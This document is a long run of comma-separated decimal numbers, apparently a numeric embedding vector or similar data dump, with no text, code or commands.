-0.024384189397096634, 0.002347927773371339, 0.02705051191151142, 0.0022120049688965082, 0.013078385964035988, -0.03726893290877342, 0.012415530160069466, -0.051658134907484055, 0.010933412238955498, 0.013309269212186337, -0.004822468850761652, 0.020272988826036453, 0.0013713313965126872, -0.007961728610098362, 0.00828198529779911, -0.007481343578547239, 0.013689108192920685, 0.0427207425236702, -0.0424824133515358, -0.028689034283161163, -0.0077606369741261005, 0.006751456297934055, -0.008058549836277962, -0.012274021282792091, -0.042988862842321396, -0.003439034800976515, 0.020153822377324104, -0.014001917093992233, -0.0418865866959095, -0.005492773372679949, -0.00954811554402113, -0.012400633655488491, 0.03142983466386795, -0.020317675545811653, 0.012080376967787743, 0.0018414754886180162, 0.003906385973095894, 0.03303856775164604, -0.014970134943723679, 0.018142908811569214, -0.011067472398281097, 0.010493990033864975, -0.002050014678388834, -0.013056042604148388, 0.012274021282792091, -0.009064006619155407, 0.01349546480923891, 0.022358380258083344, -0.04805338755249977, -0.006017845124006271, -0.007581889163702726, 0.024086276069283485, 0.011678194627165794, 0.034408967941999435, 0.01350291259586811, -0.012914533726871014, 0.002807831158861518, -0.016146890819072723, 0.018053535372018814, -0.0004287156043574214, 0.00947363767772913, 0.003902662079781294, 0.013830617070198059, -0.01906643994152546, 0.034557923674583435, -0.032681070268154144, -0.007570717483758926, -0.006662082392722368, -0.013927439227700233, -0.005954538471996784, -0.03226399049162865, -0.009652385488152504, -0.004606481641530991, 0.00007052162254694849, -0.008900154381990433, 0.011849494650959969, 0.024771476164460182, 0.0024615072179585695, 0.006971167400479317, -0.015327630564570427, 0.008579897694289684, 0.0005669659003615379, 0.004360703285783529, 0.031072339043021202, -0.0016059379559010267, 0.02715478092432022, 0.007023301906883717, -0.014225351624190807, -0.0020742202177643776, 0.02286483347415924, 0.0016226955922320485, 0.005004940554499626, -0.05883784219622612, 0.013815721496939659, -0.028048520907759666, -0.02091350220143795, -0.019647371023893356, 0.008065997622907162, 0.025695007294416428, -0.025918442755937576, -0.010210972279310226, 0.0014644291950389743, -0.005917299538850784, 0.006379065103828907, 0.02322232909500599, -0.015253152698278427, 0.01269854698330164, -0.01352525595575571, 0.016251161694526672, 0.023684093728661537, -0.02328191138803959, -0.012385738082230091, -0.04480613395571709, -0.045461542904376984, -0.0103226900100708, -0.0069525474682450294, -0.005530012305825949, -0.047636307775974274, -0.017844997346401215, 0.030953174456954002, 0.04838109388947487, -0.01899196207523346, -0.012787921354174614, -0.028242165222764015, -0.011104712262749672, -0.017234275117516518, -0.0045320033095777035, 0.010091807693243027, -0.015446796081960201, -0.024756580591201782, 0.015268048271536827, 0.03583895042538643, -0.005112933926284313, -0.013003908097743988, 0.020436840131878853, 0.018142908811569214, 0.004870879463851452, -0.017413021996617317, -0.03753705322742462, -0.004129820968955755, 0.0014923586277291179, -0.042452622205019, 0.009764103218913078, -0.012497455812990665, 0.04873858764767647, 0.030044538900256157, -0.01356994267553091, -0.015201017260551453, 0.034647297114133835, -0.016400117427110672, -0.006259899586439133, -0.03342585265636444, 0.017904579639434814, -0.0014681530883535743, 0.014791387133300304, 0.00026602711295709014, -0.024533146992325783, -0.0045096599496901035, 0.00828198529779911, 0.020585797727108, 0.005891232285648584, -0.055501215159893036, -0.010799351148307323, 0.006129562854766846, -0.024771476164460182, -0.007403141353279352, 0.029836000874638557, 0.013346508145332336, 0.008579897694289684, -0.018247179687023163, 0.018142908811569214, 0.0035190987400710583, -0.022030675783753395, -0.004431457724422216, -0.03208524361252785, -0.028406016528606415, -0.02316274493932724, -0.03145962581038475, -0.038788288831710815, -0.022656293585896492, 0.016102204099297523, -0.012512351386249065, -0.008006415329873562, -0.016176683828234673, 0.023907529190182686, 0.013339060358703136, 0.026156771928071976, -0.009309785440564156, -0.007745741400867701, 0.025799276307225227, 0.005146449431777, -0.02103266678750515, 0.010151389986276627, -0.0418567955493927, -0.0212858933955431, 0.002053738571703434, -0.0029958889354020357, 0.009369367733597755, 0.030595678836107254, 0.014150873757898808, 0.03187670558691025, -0.0017195174004882574, -0.0421547070145607, -0.014418995939195156, -0.014128530398011208, -0.019677162170410156, -0.014396651647984982, 0.03566019982099533, -0.013011355884373188, -0.032949190586805344, -0.02305847592651844, 0.006233832333236933, 0.012087825685739517, -0.02098798006772995, 0.005798134487122297, 0.012348499149084091, -0.0026868039276450872, 0.019498415291309357, -0.03926495090126991, 0.010248211212456226, 0.010069463402032852, -0.004144716542214155, -0.03929474204778671, -0.023520242422819138, -0.02106245793402195, -0.014947791583836079, -0.018098222091794014, 0.022507337853312492, 0.011916525661945343, -0.017264066264033318, -0.007723398040980101, 0.02115183137357235, 0.0053698839619755745, -0.017427917569875717, 0.016131995245814323, -0.012020794674754143, 0.015230808407068253, 0.01872383989393711, -0.0052209277637302876, 0.003426000941544771, -0.011819703504443169, -0.03160858154296875, 0.023967111483216286, 0.0024633691646158695, 0.04698089882731438, -0.017964161932468414, -0.0103971678763628, -0.03566019982099533, 0.019945284351706505, 0.014754148200154305, 0.03750726208090782, 0.007198325823992491, 0.0031001584138721228, 0.015893666073679924, 0.017591770738363266, 0.00012184181832708418, 0.01665334403514862, 0.005615662317723036, 0.015104196034371853, -0.01710021309554577, -0.0045320033095777035, 0.007835115306079388, -0.01654907502233982, -0.022134944796562195, -0.003720190143212676, 0.03539207950234413, 0.009384263306856155, -0.0413205511868, -0.0206453800201416, -0.019498415291309357, 0.009212963283061981, 0.019453726708889008, 0.005414571147412062, -0.008200058713555336, -0.00019189795420970768, 0.013622078113257885, -0.00829688087105751, 0.05487559735774994, -0.022507337853312492, -0.016444804146885872, -0.004923014435917139, -0.0007675918168388307, -0.0103897200897336, 0.005425742827355862, -0.019364353269338608, -0.003910109866410494, -0.012184646911919117, 0.01273578591644764, -0.042601577937603, -0.02511407621204853, -0.028376225382089615, 0.018068430945277214, 0.0006195661844685674, 0.011223876848816872, 0.017457708716392517, 0.008639480918645859, 0.002403786638751626, -0.026499373838305473, -0.025605633854866028, 0.03756684437394142, -0.017993953078985214, 0.014441339299082756, -0.02515876293182373, -0.003779772901907563, -0.003695984836667776, -0.01656397059559822, -0.02524813823401928, -0.004554347135126591, 0.036583732813596725, -0.047040484845638275, 0.023609615862369537, 0.006509401835501194, -0.02518855594098568, 0.011261116713285446, -0.007499963045120239, -0.009294889867305756, -0.03154899924993515, 0.014128530398011208, -0.014083843678236008, -0.03193628787994385, -0.0010669013718143106, 0.0076340241357684135, 0.0847860798239708, 0.014821178279817104, 0.011976107954978943, -0.02304358035326004, 0.010106703266501427, 0.01470946054905653, -0.00025555360480211675, 0.020034657791256905, -0.018068430945277214, 0.011037681251764297, 0.03372376784682274, -0.0025843963958323, 0.009600250981748104, -0.015878770500421524, 0.011611164547502995, 0.006658358499407768, -0.011715433560311794, -0.013056042604148388, 0.007805324159562588, 0.0023721333127468824, 0.0019103679805994034, 0.007924489676952362, 0.01861957088112831, 0.0032174617517739534, 0.02295420691370964, -0.026365311816334724, 0.005701312329620123, -0.028420912101864815, -0.02705051191151142, -0.01346567366272211, -0.0010473508154973388, -0.0031876706052571535, -0.007730845827609301, 0.0025471572298556566, 0.013227342627942562, -0.00020400066568981856, 0.02484595589339733, -0.024458667263388634, -0.004185679368674755, -0.015141434967517853, 0.013398642651736736, 0.0036475739907473326, -0.02498001605272293, 0.017636457458138466, -0.0009356334339827299, -0.025769485160708427, 0.032800234854221344, 0.01693636178970337, 0.0051985839381814, -0.019706953316926956, -0.0017837549094110727, -0.002141250530257821, 0.024369293823838234, 0.031042547896504402, -0.020585797727108, 0.021524224430322647, -0.004975149407982826, 0.00635299738496542, -0.02687176503241062, -0.02685686945915222, -0.010434407740831375, -0.0007685227901674807, -0.02313295379281044, 0.007138743530958891, 0.01141752116382122, -0.03774559497833252, -0.02317764237523079, 0.01066529005765915, 0.0061109429225325584, 0.014508369378745556, 0.005995501764118671, -0.009682176634669304, 0.01264641247689724, 0.004479868803173304, 0.0029809933621436357, 0.017859892919659615, -0.011991003528237343, 0.00688924128189683, -0.04608716070652008, -0.003790944581851363, 0.030342452228069305, 0.018053535372018814, -0.004204298835247755, 0.011901629157364368, -0.007272804155945778, 0.03503458574414253, -0.007146191317588091, 0.019975075498223305, 0.008095789700746536, 0.003703432623296976, -0.008676719851791859, -0.016027726233005524, 0.0052432711236178875, 0.009183172136545181, 0.010881276801228523, 0.0212263111025095, -0.0024689550045877695, -0.02287972904741764, 0.004558071028441191, -0.014158321544528008, 0.0211667288094759, 0.0005660349270328879, 0.041112013161182404, 0.008795885369181633, -0.024354398250579834, 0.004036722704768181, -0.0038803184870630503, 0.01465732604265213, 0.000417776609538123, -0.0010333862155675888, -0.017517292872071266, -0.027988938614726067, 0.012892190366983414, -0.026737703010439873, -0.004032998811453581, -0.00002638742262206506, 0.004643721040338278, -0.020183615386486053, -0.014515817165374756, -0.03920536860823631, -0.01870894432067871, 0.005425742827355862, 0.032442741096019745, -0.019543102011084557, 0.0003626161487773061, 0.010136494413018227, 0.011030233465135098, -0.004725647158920765, 0.03965223580598831, 0.040545977652072906, 0.015804290771484375, -0.004353255499154329, -0.01872383989393711, -0.007216945756226778, 0.022671189159154892, -0.018113117665052414, 0.015148882754147053, 0.0029996128287166357, -0.0034129673149436712, 0.0022008332889527082, 0.005574699491262436, 0.021896615624427795, 0.028361329808831215, -0.0045022121630609035, 0.002325584413483739, -0.01155902910977602, 0.018291866406798363, 0.0009859062265604734, -0.0034725498408079147, 0.007138743530958891, 0.0003253769828006625, -0.010203524492681026, -0.004874603822827339, 0.02295420691370964, 0.007421760819852352, 0.007902145385742188, 0.006751456297934055, 0.0010091806761920452, 0.005086866673082113, 0.010963203385472298, -0.00837135873734951, 0.010062015615403652, 0.023952215909957886, -0.011387729085981846, 0.011022785678505898, 0.026275938376784325, -0.014478578232228756, -0.05684182420372963, -0.009272546507418156, -0.03723914176225662, 0.0005441569373942912, -0.0017046217108145356, -0.008766094222664833, -0.0037611532025039196, 0.01680229976773262, 0.019319666549563408, -0.011648403480648994, 0.002865551970899105, 0.024011798202991486, -0.027884669601917267, -0.005090590566396713, 0.028897574171423912, 0.013063490390777588, 0.0012847504112869501, 0.032532114535570145, -0.025784380733966827, 0.006159354001283646, 0.006464715115725994, -0.02946360781788826, 0.022700980305671692, 0.014999926090240479, 0.0420057512819767, -0.024786371737718582, -0.005485325586050749, -0.017338544130325317, -0.030506305396556854, -0.009324681013822556, -0.0038132881745696068, -0.019870806485414505, 0.026737703010439873, -0.0044053904712200165, -0.006680701859295368, -0.015938352793455124, -0.003999483771622181, -0.001586387399584055, -0.012132512405514717, 0.00130150793120265, 0.013294373638927937, -0.013383747078478336, -0.003543304279446602, -0.030774425715208054, 0.001662727678194642, 0.028033625334501266, 0.006490782368928194, 0.008051102049648762, -0.006714217364788055, 0.023639407008886337, -0.02711009420454502, -0.004647444933652878, 0.04820234328508377, -0.02505449391901493, 0.023743676021695137, 0.017889684066176414, 0.0035973009653389454, -0.0045282794162631035, -0.0031448453664779663, 0.028078312054276466, -0.028778407722711563, 0.004896947182714939, -0.0013145416742190719, 0.0028134172316640615, 0.008773542009294033, 0.012385738082230091, 0.012102721258997917, -0.0000035820853554469068, -0.013584839180111885, 0.0060625323094427586, 0.007149915210902691, -0.004628825467079878, -0.01704063080251217, -0.008676719851791859, -0.014426443725824356, -0.026275938376784325, -0.01699594408273697, -0.02687176503241062, -0.00015652076399419457, 0.002401924692094326, 0.016027726233005524, -0.005079418886452913, 0.030119016766548157, -0.0212114155292511, 0.021956197917461395, -0.018276970833539963, -0.022492440417408943, 0.0009859062265604734, 0.007045645732432604, 0.010255659930408001, 0.004364427179098129, 0.005991777870804071, 0.01879831776022911, 0.007581889163702726, -0.015565960668027401, -0.00026695808628574014, 0.023624511435627937, -0.02490553818643093, 0.012758130207657814, -0.008244745433330536, 0.003267734544351697, 0.0045133838430047035, -0.010166285559535027, 0.01464243046939373, 0.0010026638628914952, 0.030416930094361305, -0.006408856250345707, -0.017293857410550117, 0.006766351871192455, -0.002414958318695426, -0.015357421711087227, -0.013257134705781937, 0.0018852315843105316, -0.008840572088956833, 0.04006931558251381, 0.009205515496432781, -0.0002799918001983315, -0.0008634825935587287, -0.013257134705781937, -0.028763512149453163, 0.015700021758675575, -0.019364353269338608, 0.0016887950478121638, -0.006669530179351568, 0.01465732604265213, -0.004468697123229504, -0.02749738283455372, 0.012318708002567291, -0.021688075736165047, -0.006047636736184359, 0.04647444933652878, -0.011655851267278194, 0.005124105606228113, 0.0006847347249276936, 0.028912469744682312, 0.004692131653428078, 0.013063490390777588, 0.0011506894370540977, -0.008222402073442936, -0.029970061033964157, 0.013994469307363033, 0.01267620362341404, -0.013860408216714859, 0.003420415101572871, -0.013257134705781937, -0.01665334403514862, -0.03196607902646065, 0.015997935086488724, -0.007138743530958891, -0.002143112476915121, 0.0003097830922342837, -0.0009980089962482452, 0.0030014747753739357, 0.009942851029336452, -0.020109135657548904, -0.026395102962851524, -0.030804216861724854, -0.015238256193697453, 0.0013238515239208937, -0.010076911188662052, 0.0007098711212165654, 0.009183172136545181, -0.030923383310437202, 0.021494431421160698, 0.026439789682626724, 0.049006711691617966, -0.009391711093485355, 0.014821178279817104, 0.010248211212456226, -0.008803333155810833, 0.006460991222411394, -0.0036028868053108454, 0.013391194865107536, -0.025546051561832428, 0.01690657064318657, -0.024339502677321434, 0.0011590683134272695, 0.02493532933294773, 0.012445321306586266, 0.008080893196165562, -0.007686158642172813, 0.005567251704633236, -0.041112013161182404, -0.014068947173655033, -0.030267974361777306, -0.014873312786221504, 0.015171226114034653, 0.009622594341635704, 0.007481343578547239, 0.010769560001790524, 0.016251161694526672, 0.010136494413018227, -0.01659376174211502, -0.02344576269388199, 0.019245188683271408, -0.001483048778027296, 0.0059843300841748714, 0.012341051362454891, -0.005042179953306913, -0.011871838010847569, 0.012452769093215466, 0.025888651609420776, -0.021479535847902298, -0.014247695915400982, 0.013666764833033085, 0.00956301111727953, 0.010002433322370052, -0.0016366603085771203, 0.023624511435627937, 0.03205545246601105, 0.01695125736296177, -0.012400633655488491, 0.023877738043665886, -0.0001965528354048729, -0.00825219415128231, 0.004077685996890068, 0.009667281061410904, -0.05445852130651474, 0.0067924195900559425, -0.003723914036527276, 0.009257650934159756, 0.009659833274781704, -0.006412580143660307, -0.0006079289596527815, 0.019841015338897705, 0.017859892919659615, 0.042899489402770996, 0.015312734991312027, -0.0012372704222798347, 0.00314670754596591, 0.00833411980420351, -0.0212412066757679, 0.011022785678505898, 0.028033625334501266, 0.012184646911919117, -0.006140734534710646, 0.017383230850100517, -0.023654302582144737, -0.00948108546435833, 0.008088341914117336, -0.024130962789058685, 0.028510287404060364, -0.011886733584105968, 0.023773467168211937, -0.01884300634264946, 0.013882751576602459, -0.01708531752228737, -0.016102204099297523, 0.010687633417546749, -0.0069302041083574295, -0.0030312661547213793, -0.006770075764507055, 0.00044081834494136274, 0.007570717483758926, 0.020287884399294853, -0.028778407722711563, -0.024384189397096634, -0.011640955694019794, -0.01696615293622017, -0.0031094683799892664, -0.007194601930677891, 0.026126980781555176, -0.00945874210447073, 0.015022269450128078, 0.013033699244260788, 0.02694624289870262, 0.002319998573511839, 0.02329680696129799, -0.011186637915670872, -0.007887249812483788, 0.002709147520363331, -0.007399417459964752, 0.015387212857604027, 0.012847503647208214, -0.005496497265994549, -0.0051948600448668, 0.003965968731790781, -0.013160312548279762, -0.02107735350728035, 0.002353513613343239, -0.019498415291309357, -0.0060848756693303585, 0.004215470980852842, 0.01347312144935131, -0.010985546745359898, 0.0032007042318582535, 0.03184691444039345, 0.004599033854901791, -0.012303812429308891, 0.0011292769340798259, 0.010747215710580349, -0.001590111292898655, -0.005146449431777, 0.024413980543613434, -0.008996976539492607, 0.032800234854221344, 0.01269109919667244, 0.005001216661185026, 0.005109210032969713, 0.028122998774051666, -0.006729112938046455, -0.018142908811569214, -0.021539120003581047, 0.024354398250579834, -0.012773025780916214, 0.013204999268054962, 0.0012344775022938848, -0.0067961434833705425, -0.017323648557066917, -0.02697603404521942, -0.02328191138803959, -0.0033962097950279713, 0.011775016784667969, -0.00574227562174201, 0.0019997418858110905, -0.0032751825638115406, 0.0004720061260741204, 0.0038542512338608503, 0.011328146792948246, -0.001116243307478726, 0.010248211212456226, 0.012058033607900143, 0.0059619867242872715, 0.009913058951497078, 0.020407048985362053, -0.008967185392975807, 0.006449819076806307, 0.017189588397741318, 0.002964235609397292, 0.009272546507418156, 0.021985989063978195, 0.015789395198225975, 0.008728854358196259, 0.006509401835501194, -0.010479094460606575, 0.0033738662023097277, -0.00954066775739193, 0.036464568227529526, -0.010814246721565723, -0.013145416975021362, -0.006855725776404142, 0.011141951195895672, -0.02489064261317253, -0.005202307831496, 0.0009896302362903953, 0.0011534823570400476, 0.018351448699831963, -0.012974116951227188, -0.004546899348497391, 0.0019922940991818905, -0.008900154381990433, -0.03142983466386795, 0.02322232909500599, 0.012341051362454891, 0.0012828884646296501, 0.008870363235473633, -0.01699594408273697, -0.012437873519957066, 0.004118648823350668, -0.002403786638751626, 0.003327317303046584, -0.005038455594331026, -0.0052432711236178875, -0.0007117330678738654, -0.008036206476390362, -0.010181181132793427, -0.007049369625747204, -0.005057075526565313, -0.01267620362341404, 0.016266057267785072, -0.013838064856827259, 0.00829688087105751, -0.019170710816979408, 0.0052544428035616875, 0.002778040012344718, 0.008036206476390362, 0.0414992980659008, 0.0045133838430047035, -0.0076340241357684135, 0.00315229338593781, -0.015007373876869678, -0.012959221377968788, 0.015342526137828827, 0.0030387139413505793, -0.002230624668300152, -0.024503355845808983, -0.015953248366713524, -0.009108694270253181, 0.019334562122821808, 0.01067273784428835, 0.0009179448243230581, -0.007581889163702726, 0.01654907502233982, -0.009347024373710155, -0.015066956169903278, 0.01060570776462555, 0.017830099910497665, 0.014567951671779156, 0.013860408216714859, 0.00009309785673394799, 0.020153822377324104, 0.0002809227735269815, -0.026186564937233925, -0.00004445422382559627, 0.013234790414571762, -0.004937910009175539, 0.01870894432067871, -0.013890199363231659, 0.00831922423094511, -0.0075409263372421265, -0.012259125709533691, 0.008892706595361233, -0.0003526081272866577, 0.008691615425050259, 0.008080893196165562, -0.030565887689590454, -0.011149398982524872, -0.011670746840536594, -0.011618612334132195, 0.011089816689491272, -0.023788362741470337, -0.013212447054684162, -0.0029065150301903486, -0.002241796348243952, 0.023698989301919937, -0.02691645175218582, -0.014210456050932407, -0.013860408216714859, -0.02290952019393444, -0.03196607902646065, -0.004025551024824381, -0.0027333530597388744, 0.00636416906490922, -0.009793894365429878, 0.015923457220196724, -0.01380827371031046, -0.010747215710580349, -0.017189588397741318, -0.001201893319375813, 0.03324710577726364, -0.0015323907136917114, -0.004047894850373268, -0.011194085702300072, -0.005842821206897497, -0.0059694345109164715, 0.004733094945549965, 0.004073962103575468, -0.00689296517521143, -0.00943639874458313, -0.005909851752221584, -0.004610205534845591, -0.012467664666473866, -0.0415886715054512, 0.007079160772264004, 0.014009364880621433, 0.0045357272028923035, 0.019304770976305008, 0.014754148200154305, 0.0009142209310084581, 0.001114381244406104, -0.0031057444866746664, -0.0004938840866088867, 0.010709976777434349, 0.02722926065325737, 0.018351448699831963, 0.01711510866880417, 0.018202492967247963, -0.009399158880114555, 0.021375266835093498, 0.008073445409536362, 0.0034613781608641148, 0.00008640644227853045, -0.00044430949492380023, -0.01660865731537342, -0.014761595986783504, 0.0016077999025583267, 0.010218420065939426, -0.027988938614726067, 0.0013219894608482718, 0.0011674470733851194, -0.014322173781692982, 0.00579068623483181, 0.024696998298168182, -0.004472421016544104, 0.005314025562256575, -0.0038803184870630503, 0.017800308763980865, 0.023609615862369537, -0.0025881202891469, -0.02514386735856533, -0.005381056107580662, -0.002692390000447631, 0.013294373638927937, 0.0207943357527256, 0.01882810890674591, 0.0052060317248106, 0.020451735705137253, -0.0006312034674920142, 0.0010901758214458823, 0.0017362749204039574, 0.00577206676825881, 0.0037462576292455196, 0.015565960668027401, -0.006215212866663933, 0.015059508383274078, -0.007432932499796152, -0.007380797993391752, -0.011350490152835846, -0.01711510866880417, 0.0024540594313293695, -0.0020798060577362776, -0.013130521401762962, -0.00316905090585351, 0.013636973686516285, -0.013137969188392162, -0.010181181132793427, -0.0013592286268249154, 0.003939901012927294, -0.0051948600448668, 0.004550623241811991, -0.007511134725064039, -0.004651168826967478, -0.01462008710950613, 0.008632033132016659, -0.0020071896724402905, 0.015655335038900375, 0.011916525661945343, 0.013897647149860859, -0.0424824133515358, -0.00129406014457345, 0.009108694270253181, -0.008110685274004936, -0.007425484713166952, -0.0031076064333319664, -0.008028758689761162, -0.022179633378982544, 0.01659376174211502, -0.008557554334402084, 0.027735712006688118, -0.004554347135126591, 0.007008406333625317, -0.0022771735675632954, -0.010709976777434349, 0.026201460510492325, -0.015774499624967575, -0.011678194627165794, -0.015476587228477001, -0.022581815719604492, 0.017755622044205666, 0.015625543892383575, -0.024548042565584183, 0.029895583167672157, -0.024205442517995834, -0.02512897178530693, 0.01669803075492382, -0.004226642660796642, -0.028778407722711563, -0.0005874474300071597, -0.0034539303742349148, -0.009414054453372955, -0.012288916856050491, -0.020079344511032104, 0.0027631442062556744, 0.028257060796022415, 0.004781505558639765, 0.015819186344742775, -0.002346065826714039, -0.000030373174013220705, -0.006453542970120907, 0.004040446598082781, -0.01896217092871666, -0.013279478065669537, 0.009004424326121807, 0.04340594261884689, 0.01262406911700964, -0.007812771946191788, 0.017696039751172066, 0.001111588324420154, 0.007511134725064039, -0.007526030298322439, 0.004092581570148468, -0.030491407960653305, 0.015357421711087227, -0.013003908097743988, 0.006974891293793917, -0.013398642651736736, -0.002770592225715518, 0.007827667519450188, -0.0013257134705781937, -0.016042621806263924, 0.002033257158473134, 0.0006349273608066142, -0.02328191138803959, -0.008162819780409336, 0.0069153085350990295, 0.024220338091254234, 0.025978025048971176, 0.01657886616885662, 0.012206990271806717, -0.0033813139889389277, -0.021434849128127098, -0.0207645446062088, -0.010456751100718975, -0.0035917151253670454, 0.016027726233005524, 0.02712498977780342, -0.007518582511693239, -0.0022864833008497953, 0.0008276398875750601, 0.004558071028441191, -0.004241538234055042, 0.0005469499155879021, -0.0005232099210843444, 0.0076489197090268135, 0.005809306167066097, 0.0018396135419607162, 0.008594794198870659, 0.022477544844150543, -0.010903620161116123, -0.005544908344745636, 0.013890199363231659, 0.013026251457631588, -0.022477544844150543, 0.0067998673766851425, -0.007004682440310717, -0.004271329380571842, 0.006170525681227446, -0.011976107954978943, -0.016191579401493073, -0.0005087797762826085, -0.004349531605839729, -0.001850785338319838, -0.00578696234151721, -0.007276528049260378, -0.013182655908167362, 0.0009589078836143017, 0.012363394722342491, 0.02740800753235817, 0.016295848414301872, 0.002239934401586652, 0.017413021996617317, 0.012229333631694317, 0.007384521886706352, -0.014813730493187904, 0.005638006143271923, -0.024488458409905434, 0.007998967543244362, 0.008691615425050259, 0.002802245318889618, -0.012765577994287014, 0.005034731701016426, 0.021434849128127098, -0.008632033132016659, 0.004636273253709078, -0.0028264508582651615, -0.0051613450050354, -0.004193127155303955, -0.0042973970994353294, 0.0017362749204039574, 0.001659003784880042, 0.0019019891042262316, 0.012281469069421291, -0.011983555741608143, -0.0010343171888962388, 0.010940860025584698, 0.014039156027138233, -0.0018303038086742163, -0.002969821449369192, 0.012154855765402317, -0.00828198529779911, -0.008177715353667736, -0.015908561646938324, 0.030923383310437202, -0.00951832439750433, -0.0008611551602371037, 0.023698989301919937, 0.01060570776462555, -0.006613671313971281, -0.006505677942186594, 0.004718199372291565, -0.015878770500421524, -0.011961212381720543, 0.0005325197125785053, 0.011804807931184769, 0.002228762488812208, -0.007377074100077152, 0.007373349741101265, 0.015938352793455124, 0.002779901959002018, 0.020302779972553253, -0.01914091780781746, -0.0008616206469014287, -0.005544908344745636, 0.023952215909957886, 0.007298871874809265, 0.01065784227102995, -0.012303812429308891, 0.010367376729846, -0.01342098694294691, -0.008751198649406433, -0.010099255479872227, -0.020049553364515305, -0.014932896010577679, 0.0013620215468108654, -0.013026251457631588, 0.004152164328843355, -0.0033552467357367277, 0.0060699800960719585, -0.004554347135126591, -0.011611164547502995, -0.024443771690130234, -0.038430795073509216, 0.018470613285899162, 0.008520315401256084, 0.010829142294824123, -0.019617579877376556, -0.003995759878307581, 0.005299129988998175, -0.01653417944908142, 0.01268365141004324, 0.016042621806263924, -0.006412580143660307, -0.0069488235749304295, -0.0051762405782938, 0.01668313518166542, -0.021688075736165047, 0.03202566131949425, 0.03810308873653412, -0.008133028633892536, 0.0029195486567914486, 0.003936177119612694, 0.007879802025854588, 0.006863173563033342, 0.00019957852782681584, -0.009637489914894104, 0.007607956416904926, 0.02344576269388199, -0.0042973970994353294, 0.009339576587080956, -0.007365901954472065, -0.00008233341213781387, 0.004785229451954365, 0.012355946935713291, 0.0004764282493852079, -0.006460991222411394, 0.008520315401256084, -0.000028176647902000695, 0.026395102962851524, -0.0010399030288681388, -0.01911112666130066, -0.009168276563286781, -0.015997935086488724, 0.020496422424912453, 0.018202492967247963, 0.0033068356569856405, -0.001213064999319613, 0.002027671318501234, 0.00954066775739193, -0.0017111385241150856, 0.010799351148307323, -0.010419512167572975, -0.017844997346401215, -0.020392153412103653, -0.0003430655924603343, 0.0033049737103283405, 0.0023758572060614824, 0.02509918063879013, -0.02929975651204586, 0.01380827371031046, 0.003347798716276884, -0.010225867852568626, -0.013882751576602459, -0.0010883138747885823, 0.005392227787524462, -0.0033664184156805277, 0.013934887014329433, -0.025903547182679176, -0.01701083965599537, -0.026275938376784325, 0.008713958784937859, 0.004181955475360155, 0.010985546745359898, -0.0016161787789314985, 0.02760165184736252, -0.010404615662992, -0.01357739046216011, -0.009354472160339355, -0.02304358035326004, -0.013860408216714859, -0.021673180162906647, 0.001030593179166317, 0.028644347563385963, -0.025695007294416428, -0.02947850339114666, -0.009987537749111652, -0.005898680072277784, 0.005004940554499626, -0.0036792270839214325, 0.004126097075641155, -0.02107735350728035, -0.03962244465947151, -0.007395693566650152, -0.009965194389224052, -0.006844554096460342, -0.01851530186831951, 0.028435807675123215, -0.017964161932468414, 0.0037313620559871197, 0.013666764833033085, -0.019677162170410156, -0.010940860025584698, 0.006535469088703394, 0.0026272214017808437, -0.000009877100637822878, -0.004759162198752165, -0.021732762455940247, -0.02938912995159626, 0.011134503409266472, -0.009585355408489704, -0.011007890105247498, 0.0015994211426004767, 0.000743851822335273, -0.01666823960840702, -0.01357739046216011, -0.01714489981532097, 0.00951832439750433, 0.010918516665697098, 0.022686084732413292, 0.00828198529779911, -0.0017465157434344292, -0.0059619867242872715, -0.0022548299748450518, -0.011037681251764297, -0.008929946459829807, 0.0008788437116891146, -0.001851716311648488, 0.009384263306856155, -0.008870363235473633, -0.01903664879500866, -0.0009840442799031734, 0.026246147230267525, 0.0007759706350043416, -0.0006423752056434751, 0.013681660406291485, 0.012557038106024265, -0.01461263932287693, -5.309486823534826e-7, 0.009674728848040104, 0.011298355646431446, -0.009324681013822556, 0.01909623108804226, 0.00955556333065033, -0.009294889867305756, -0.000554863188881427, 0.00631575845181942, 0.0010678323451429605, -0.021494431421160698, -0.019915493205189705, -0.024354398250579834, -0.011842046864330769, -0.018142908811569214, 0.0104120634496212, -0.00011026277206838131, 0.024726789444684982, 0.011030233465135098, -0.010471646673977375, 0.009414054453372955, 0.030595678836107254, 0.025888651609420776, -0.005057075526565313, 0.022179633378982544, 0.015551065094769001, -0.0009365644073113799, -0.005377332214266062, -0.01467222161591053, -0.024771476164460182, 0.017293857410550117, -0.024696998298168182, -0.006230108439922333, -0.004062790423631668, -0.009659833274781704, -0.002956787822768092, 0.010419512167572975, -0.008222402073442936, 0.02098798006772995, -0.01461263932287693, -0.022000884637236595, -0.013286925852298737, -0.007555821910500526, 0.019975075498223305, 0.019766535609960556, 0.007857458665966988, 0.010009881108999252, -0.0017502396367490292, -0.012936878018081188, -0.0012205129023641348, 0.012884742580354214, 0.03723914176225662, 0.0021468366030603647, -0.0212709978222847, 0.004707027226686478, -0.017576875165104866, 0.020243197679519653, 0.01061315555125475, -0.008795885369181633, -0.009190619923174381, -0.003254700917750597, -0.007209497969597578, -0.005474153906106949, 0.006628567352890968, -0.006505677942186594, 0.012802816927433014, 0.0018731288146227598, -0.013860408216714859, -0.000834622245747596, 0.022581815719604492, -0.00129964598454535, 0.02100287564098835, 0.008587346412241459, -0.00637161685153842, 0.006997234653681517, 0.013599734753370285, 0.004066514316946268, -0.011782464571297169, 0.007008406333625317, -0.010255659930408001, -0.009250203147530556, -0.01701083965599537, -0.0059843300841748714, -0.007105228025466204, 0.019975075498223305, 0.004111201036721468, -0.023788362741470337, -0.013629525899887085, 0.003232357557862997, 0.009347024373710155, 0.01378593035042286, -0.009302337653934956, 0.03223419934511185, -0.0026365311350673437, 0.015655335038900375, 0.003943624906241894, -0.01342098694294691, 0.0044240099377930164, -0.002403786638751626, 0.007138743530958891, 0.0012540280586108565, 0.011164294555783272, -0.015133987180888653, -0.0004282501176930964, -0.010032224468886852, 0.0035135129000991583, -0.014024260453879833, -0.0015966282226145267, -0.029850896447896957, 0.040754515677690506, -0.01674271747469902, 0.0005315887392498553, -0.014798834919929504, -0.010151389986276627, -0.00129592209123075, 0.015193569473922253, -0.027661234140396118, 0.008065997622907162, -0.02696113847196102, -0.007000958546996117, 0.034766461700201035, 0.025858860462903976, -0.01266130805015564, -0.002887895330786705, -0.009049111045897007, -0.013711451552808285, 0.01464987825602293, 0.0028487942181527615, -0.009205515496432781, -0.008065997622907162, -0.022000884637236595, -0.014783939346671104, 0.012244229204952717, -0.010568467900156975, -0.0422142893075943, 0.02548646740615368, 0.0012577519519254565, -0.03384293243288994, 0.010188628919422626, 0.003061057301238179, -0.004152164328843355, 0.011134503409266472, 